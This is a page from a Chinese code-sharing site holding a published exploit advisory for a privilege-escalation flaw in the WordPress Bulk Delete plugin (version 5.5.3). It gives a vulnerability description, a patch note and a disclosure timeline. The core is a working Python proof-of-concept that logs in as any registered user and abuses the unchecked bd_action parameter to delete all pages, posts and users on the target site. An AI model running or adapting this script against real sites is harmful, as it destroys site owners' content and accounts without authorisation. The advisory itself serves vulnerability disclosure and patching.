扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
''' * Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation] * Discovery Date: 2016-02-10 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: http://bulkwp.com/ * Software Link: https://wordpress.org/plugins/bulk-delete/ * Version: 5.5.3 * Tested on: WordPress 4.4.2 * Category: WebApps, WordPress Description ----------- _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are: - <code>bd_delete_pages_by_status</code>: deletes all pages by status - <code>bd_delete_posts_by_post_type</code>: deletes all posts by type - <code>bd_delete_users_by_meta</code>: delete all users with a specific pair of meta name, meta value Nearly all actions registered by this plugin can be performed from any user, as long as they passed to a query var named <code>bd_action</code> and the user has a valid account. These actions would normally require administrative wrights, so we can consider this as a privilege escalation vulnerability. PoC --- The following script will delete all pages, posts and users from the infected website. ''' #!/usr/bin/python3 ################################################################################ # Bulk Delete Privilege Escalation Exploit # # **IMPORTANT** Don't use this in a production site, if vulnerable it will # delete nearly all your sites content # # Author: Panagiotis Vagenas <pan.vagenas@gmail.com> ################################################################################ import requests loginUrl = 'http://example.com/wp-login.php' adminUrl = 'http://example.com/wp-admin/index.php' loginPostData = { 'log': 'username', 'pwd': 'password', 'rememberme': 'forever', 'wp-submit': 'Log+In' } l = requests.post(loginUrl, data=loginPostData) if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0: print("Couldn't acquire a valid session") exit(1) loggedInCookies = l.history[0].cookies def do_action(action, data): try: requests.post( adminUrl + '?bd_action=' + action, data=data, cookies=loggedInCookies, timeout=30 ) except TimeoutError: print('Action ' + action + ' timed out') else: print('Action ' + action + ' performed') print('Deleting all pages') do_action( 'delete_pages_by_status', { 'smbd_pages_force_delete': 'true', 'smbd_published_pages': 'published_pages', 'smbd_draft_pages': 'draft_pages', 'smbd_pending_pages': 'pending_pages', 'smbd_future_pages': 'future_pages', 'smbd_private_pages': 'private_pages', } ) print('Deleting all posts from all default post types') do_action('delete_posts_by_post_type', {'smbd_types[]': [ 'post', 'page', 'attachment', 'revision', 'nav_menu_item' ]}) print('Deleting all users') do_action( 'delete_users_by_meta', { 'smbd_u_meta_key': 'nickname', 'smbd_u_meta_compare': 'LIKE', 'smbd_u_meta_value': '', } ) exit(0) ''' Solution -------- Upgrade to v5.5.4 Timeline -------- 1. **2016-02-10**: Requested CVE ID 2. **2016-02-10**: Vendor notified through wordpress.org support forums 3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com 4. **2016-02-10**: Vendor responded and received details about the issue 5. **2016-02-10**: Vendor verified vulnerability 6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue ''' |
体验盒子
